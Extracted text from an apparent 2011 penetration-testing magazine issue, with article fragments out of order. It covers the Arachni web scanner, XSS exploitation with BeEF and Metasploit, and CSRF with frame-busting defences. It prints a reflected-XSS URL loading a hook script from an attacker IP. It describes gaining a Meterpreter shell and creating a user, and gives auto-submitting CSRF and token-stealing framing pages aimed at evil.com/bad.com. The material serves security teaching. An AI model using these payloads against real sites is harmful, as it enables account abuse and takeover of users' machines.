In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information, in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops the leakage of sensitive data when the web application has weaknesses which the WAF cannot compensate for. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance, and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest magazine:
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22nd
WEB APP VULNERABILITIES
We can vouch that both simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.

Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.

The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.

The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest Authentication, and NTLM.

At the start of every scan a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler is always run at the start of the scan. This crawler has filters for redundant pages based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.

The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.

Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.

Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization and the Metareport, which provides Metasploit integration for automated and assisted exploitation.

Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of currently available plug-ins.

Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid). This is great if you want to speed up the scan, or if you want to execute some crazy things like running
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

Plug-ins:
bull Passive Proxy – analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
bull Form-based AutoLogin – performs an automated login
bull Dictionary attacker – performs dictionary attacks against HTTP Authentication and Forms-based authentication
bull Profiler – performs taint analysis with benign inputs and response time analysis
bull Cookie collector – keeps track of cookies while establishing a timeline of the changes
bull Healthmap – generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
bull Content-types – logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
bull WAF (Web Application Firewall) Detector – establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
bull MetaModules – loads and runs high-level meta-analysis modules pre/mid/post-scan:
  bull AutoThrottle – dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  bull TimeoutNotice – provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  bull Uniformity – reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
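The idea behind the WAF Detector plug-in's rDiff analysis can be pictured with a loose sketch (this is an illustration of the concept using Python's difflib, not Arachni's actual implementation; the responses are canned strings, and the 0.8 threshold is an arbitrary example value):

```python
import difflib

def behaviour_changed(baseline: str, probed: str, threshold: float = 0.8) -> bool:
    """Treat a large textual difference between the baseline response and
    the response to a malicious-looking probe as a behavioural change."""
    similarity = difflib.SequenceMatcher(None, baseline, probed).ratio()
    return similarity < threshold

normal  = "<html><body>Search results for: shoes</body></html>"
blocked = "<html><body>403 Forbidden - request blocked</body></html>"
print(behaviour_changed(normal, normal))   # False
print(behaviour_changed(normal, blocked))  # True
```

If benign inputs produce the baseline response but malicious inputs consistently trigger a very different one, something in front of the application (likely a WAF) is intervening.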
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.

Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change all the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.

Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note: these are the same commands as with the Linux installation): Listing 2.
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all the functionality that is available from the command-line.
The GUI can be started by executing the following commands:

$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1. Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):

• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, …
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, …
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  • Tutorial: serves as an example
  • Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
                          <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the term of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated from
# open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '*' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed,
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can easily be extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree; you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needs to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows: Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in the further scans), as well as creating a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, are now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF, Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. User enters text in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code:

<?php
$a=$_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text, the attacker enters a simple JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF – Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball, copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The "jobs" command
Figure 10. Metasploit after clicking "Send Now"
Figure 11. Meterpreter window – screenshot 1
Figure 12. Meterpreter window – screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figure 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window – screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS prevention cheat sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
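As a minimal sketch of the encoding step recommended above (shown here in Ruby with the standard cgi library, rather than the PHP used earlier in this article), HTML-encoding the reflected value turns the alert(document.domain) payload into inert text:

```ruby
require 'cgi'

# Encode user-controlled input before reflecting it back in a page.
payload = "<script>alert(document.domain)</script>"
safe    = CGI.escapeHTML(payload)

puts safe  # => &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

The browser now renders the payload as plain text instead of executing it.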
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user input, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System, Network and Web Application Penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvind.doraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind AND http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com" style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:

• Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
  <iframe name="hiddenFrame"></iframe>
  <form name="Form" action="http://site.com/post.php"
        target="hiddenFrame"
        method="POST">
    <input type="text" name="message" value="I like www.evil.com" >
    <input type="submit" >
  </form>
  <script>document.Form.submit()</script>
</div>
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (Evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best way to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, to compare them after the form is submitted.
Mechanisms used to subvert one-time tokens usually rely on brute-force attacks. Brute-forcing one-time tokens is useful only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
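The same pattern as the PHP snippet above, sketched in Ruby (a plain hash stands in for PHP's $_SESSION; illustration only): generate an unpredictable token, store a server-side copy, and accept the POST only when the submitted copy matches:

```ruby
require 'securerandom'

# Hypothetical session store standing in for PHP's $_SESSION.
session = {}
session[:token] = SecureRandom.hex(16)  # unpredictable one-time token

# Accept the form submission only when the submitted token matches
# the server-side copy.
def valid_request?(session, params)
  !session[:token].nil? && session[:token] == params[:token]
end

puts valid_request?(session, { token: session[:token] })  # => true
puts valid_request?(session, { token: "guessed" })        # => false
```

Because a cross-site attacker cannot read the victim's copy of the token, a forged POST fails the comparison.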
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token

<?php session_start();?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(),true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token;?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if( self == top ) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level, and he is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" >
<input type="hidden" name="token" value="" >
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38 | http://pentestmag.com | 01/2011 (1) November
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.

